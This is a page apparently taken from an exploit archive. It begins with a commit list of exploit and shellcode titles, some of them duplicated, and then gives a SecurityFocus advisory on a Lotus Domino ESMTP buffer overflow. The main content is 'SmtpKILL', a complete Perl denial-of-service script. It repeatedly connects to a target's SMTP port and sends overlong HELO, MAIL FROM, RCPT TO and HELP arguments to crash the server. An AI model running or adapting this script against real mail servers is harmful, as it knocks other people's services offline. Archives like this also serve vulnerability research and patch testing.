
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
84 lines
No EOL
2.4 KiB
Perl
Executable file
84 lines
No EOL
2.4 KiB
Perl
Executable file
Lotus Domino Enterprise Server 5.0.1/5.0.2/5.0.3,Mail Server 5.0.1/5.0.2/5.0.3 Buffer Overflow
|
|
|
|
source: https://www.securityfocus.com/bid/1229/info
|
|
|
|
The code that handles the 'rcpt to' 'saml from' and 'soml from' commands in the ESMTP service of Lotus Domino Server has an unchecked buffer. If Lotus Domino Server receives an argument of more than 4 KB to the any of the listed commands, the system will crash and will require a reboot in order to regain normal functionality.
|
|
|
|
#!/usr/bin/perl
|
|
# Need net::telnet to run
|
|
# Expl0it By smiler@vxd.org
|
|
# Tested with sucess against Lotus Notes 5.0.1, 5.0.2b, 5.0.3
|
|
# CMail Server version 2.4.6, Argosoft Mail Server version 1.2.1.0
|
|
# and probably many others that I hadnt chance to explore.
|
|
# I wrote this after Michal Zalewski brought this issue in BugTraq.
|
|
# Cheers 351 and FractalG :)
|
|
|
|
use Net::Telnet;
|
|
|
|
|
|
print "SmtpKILL By smiler\@vxd.org\n";
|
|
|
|
if (not $ARGV[1]) {
|
|
print qq~
|
|
Usage : smtpkill.pl <type> <host>
|
|
<type> Type of attack :
|
|
type 1 = long mail from: someone\@4k_of_junk
|
|
type 2 = long rcpt to: someone\@4k_of_junk
|
|
type 3 = long helo longdomain_with_4k_of_junk
|
|
type 4 = long undefined command (4k_of_junk)
|
|
type 5 = long help 4k_of_junk
|
|
type 6 = long mail from: and mail to:
|
|
|
|
<host> Host that you want to DOS, Ip or Domain will be ok.
|
|
Example Usage : smtpkill.pl 5 127.0.0.1
|
|
~; exit;}
|
|
|
|
$type=$ARGV[0];
|
|
$target=$ARGV[1];
|
|
|
|
print "TYPE ATTACK: $type\n";
|
|
print "TARGET : $target\n";
|
|
|
|
|
|
|
|
for ($i=4096;$i<5096;$i++)
|
|
{
|
|
$obj=Net::Telnet->new( Host => "$target",Port => 25);
|
|
|
|
if ($type=~ "1") {
|
|
$helo="helo ptrulez";
|
|
$from="mail from: v0v0@". 'ptrulez' x $i;
|
|
$rcpt="rcpt to: v0v0\@v0v0.pt";
|
|
}
|
|
|
|
if ($type=~ "2") {
|
|
$helo="helo ptrulez";
|
|
$from="mail from: v0v0\@v0v0.pt";
|
|
$rcpt="rcpt to: v0v0@". 'ptrulez' x $i;
|
|
}
|
|
|
|
if ($type=~ "3") {
|
|
$helo="helo ". 'ptrulez' x $i;
|
|
$from="mail from: v0v0\@v0v0.pt";
|
|
$rcpt="rcpt to: v0v0\@v0v0.pt";
|
|
}
|
|
|
|
if ($type=~ "4") {
|
|
$helo="havesomefun". 'ptrulez' x $i;
|
|
}
|
|
|
|
if ($type=~ "5") {
|
|
$helo="help ". 'ptrulez' x $i;
|
|
}
|
|
|
|
if ($type=~ "6") {
|
|
$helo="helo ptrulez";
|
|
$from="mail from: ". 'ptrulez' x $i;
|
|
$rcpt="rcpt to: ". 'ptrulez' x $i;
|
|
}
|
|
|
|
print "$helo\n";$obj->print("$helo");
|
|
print "$from\n";$obj->print("$from");
|
|
print "$rcpt\n";$obj->print("$rcpt");
|
|
$obj->close;
|
|
} |